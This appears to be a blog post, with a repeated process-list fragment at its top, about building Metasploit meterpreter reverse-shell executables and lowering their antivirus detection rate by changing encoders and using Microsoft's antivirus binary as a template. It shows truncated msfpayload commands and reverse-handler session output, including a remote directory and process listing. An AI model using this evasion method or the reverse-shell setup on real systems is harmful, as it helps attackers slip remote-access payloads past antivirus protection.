1200 svchost.exe x86 C:\WINDOWS\System32\svchost.exe
1336 svchost.exe x86 C:\WINDOWS\System32\svchost.exe
1448 explorer.exe x86 HD8R2JDS87REW82\Administrator C:\WINDOWS\Explorer.EXE
1616 spoolsv.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1684 msmsgs.exe x86 HD8R2JDS87REW82\Administrator C:\Program Files\Messenger\msmsgs.exe
1828 rundll32.exe x86 HD8R2JDS87REW82\Administrator C:\WINDOWS\system32\rundll32.exe
940 alg.exe x86 C:\WINDOWS\System32\alg.exe
1300 wscntfy.exe x86 HD8R2JDS87REW82\Administrator C:\WINDOWS\system32\wscntfy.exe
1028 cwstart.exe x86 HD8R2JDS87REW82\Administrator C:\analysis\cwstart.exe
1660 cwstart.exe x86 HD8R2JDS87REW82\Administrator C:\analysis\cwstart.exe
1700 popwack.exe x86 HD8R2JDS87REW82\Administrator C:\analysis\popwack.exe
1756 cwstart.exe x86 HD8R2JDS87REW82\Administrator C:\analysis\cwstart.exe
1444 0B7BBu.exe x86 HD8R2JDS87REW82\Administrator C:\0B7BBu.exe
2028 wuauclt.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\wuauclt.exe
2016 wuauclt.exe x86 HD8R2JDS87REW82\Administrator C:\WINDOWS\system32\wuauclt.exe
1820 wmiprvse.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\wbem\wmiprvse.exe
So that's about it, the connection was dropped after that, and in a couple of days my file will be marked from more engines as viral i guess.
Next thing that i'll like to do is to find out from where this connection came. Was it cause the file was on novirusthanks that claims they do not distribute the sample, or from virustotal.
More on part 2
First attempt, got a high rate of red flags, on virustotal and novirusthanks, around 35% to 40%. The command that i had used were:
./msfpayload windows/meterpreter/reverse_
I changed the encoder and i got some slightly better results with:
./msfpayload windows/meterpreter/reverse_
Finally i ended with
./msfpayload windows/meterpreter/reverse_
Msseces.exe is the Microsoft antivirus and i used it as template for the msfencode. It produced a nice big exe that was almost undetectable. Actually 3 hits in novirusthanks and Result: 5/41 (12.2%) on virustotal ( MD5...: ca904e0c8ac8ec6e34b85f5c1c9b36
So i fired up today msfconsole and multi handler to be ready to test my exe files, as i was going to scramble them with some commercial packers/encryptors/protectors. As i was going through a list of protectors to start i saw a strange connection to my console
[*] Started reverse handler on myhost:4444
[*] Starting the payload handler...
[*] Sending stage (747008 bytes)
[*] Meterpreter session 1 opened (myhost:4444 -> 67.124.xx.xx:47364)
I did immediately an ls and i saw the following
meterpreter > ls
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- -------------
100777/rwxrwxrwx 1048392 fil Fri Mar 05 13:39:03 +0200 2010 0B7BBu.exe
100777/rwxrwxrwx 0 fil Sat Oct 14 19:27:15 +0300 2006 AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil Sat Oct 14 19:27:15 +0300 2006 CONFIG.SYS
40777/rwxrwxrwx 0 dir Sat Oct 14 19:44:53 +0300 2006 Documents and Settings
100444/r--r--r-- 0 fil Sat Oct 14 19:27:15 +0300 2006 IO.SYS
100444/r--r--r-- 0 fil Sat Oct 14 19:27:15 +0300 2006 MSDOS.SYS
100555/r-xr-xr-x 47564 fil Sat Oct 14 19:49:28 +0300 2006 NTDETECT.COM
40555/r-xr-xr-x 0 dir Tue Aug 12 00:54:21 +0300 2008 Program Files
40777/rwxrwxrwx 0 dir Tue Aug 12 00:12:52 +0300 2008 RECYCLER
40777/rwxrwxrwx 0 dir Wed Nov 22 00:13:02 +0200 2006 System Volume Information
40777/rwxrwxrwx 0 dir Tue Aug 12 00:54:27 +0300 2008 WINDOWS
100666/rw-rw-rw- 202 fil Wed Nov 22 00:15:27 +0200 2006 boot.ini
100444/r--r--r-- 250032 fil Sat Oct 14 19:49:28 +0300 2006 ntldr
100666/rw-rw-rw- 402653184 fil Fri Mar 05 13:38:03 +0200 2010 pagefile.sys
40777/rwxrwxrwx 0 dir Tue Aug 12 00:15:46 +0300 2008 temp
The 0B7BBu.exe was the same size as my file, and the process list:
meterpreter > ps
Process list
============
PID Name Arch User Path
--- ---- ---- ---- ----
0 [System Process]
4 System x86
420 smss.exe x86 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
684 csrss.exe x86 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.
708 winlogon.exe x86 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\
752 services.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.
764 lsass.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
920 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.
988 svchost.exe x86
1108 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.
1200 svchost.exe x86
1336 svchost.exe x86
1448 explorer.exe x86 HD8R2JDS87REW82\Administrator C:\WINDOWS\Explorer.EXE
1616 spoolsv.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.
1684 msmsgs.exe x86 HD8R2JDS87REW82\Administrator C:\Program Files\Messenger\msmsgs.exe
1828 rundll32.exe x86 HD8R2JDS87REW82\Administrator C:\WINDOWS\system32\rundll32.
940 alg.exe x86
1300 wscntfy.exe x86 HD8R2JDS87REW82\Administrator C:\WINDOWS\system32\wscntfy.
1028 cwstart.exe x86 HD8R2JDS87REW82\Administrator C:\analysis\cwstart.exe
1660 cwstart.exe x86 HD8R2JDS87REW82\Administrator C:\analysis\cwstart.exe
1700 popwack.exe x86 HD8R2JDS87REW82\Administrator C:\analysis\popwack.exe
1756 cwstart.exe x86 HD8R2JDS87REW82\Administrator C:\analysis\cwstart.exe
1444 0B7BBu.exe x86 HD8R2JDS87REW82\Administrator C:\0B7BBu.exe
2028 wuauclt.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\wuauclt.
2016 wuauclt.exe x86 HD8R2JDS87REW82\Administrator C:\WINDOWS\system32\wuauclt.
1820 wmiprvse.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\wbem\
So that's about it, the connection was dropped after that, and in a couple of days my file will be marked from more engines as viral i guess.
Next thing that i'll like to do is to find out from where this connection came. Was it cause the file was on novirusthanks that claims they do not distribute the sample, or from virustotal.
More on part 2
Subscribe to:
Posts (Atom)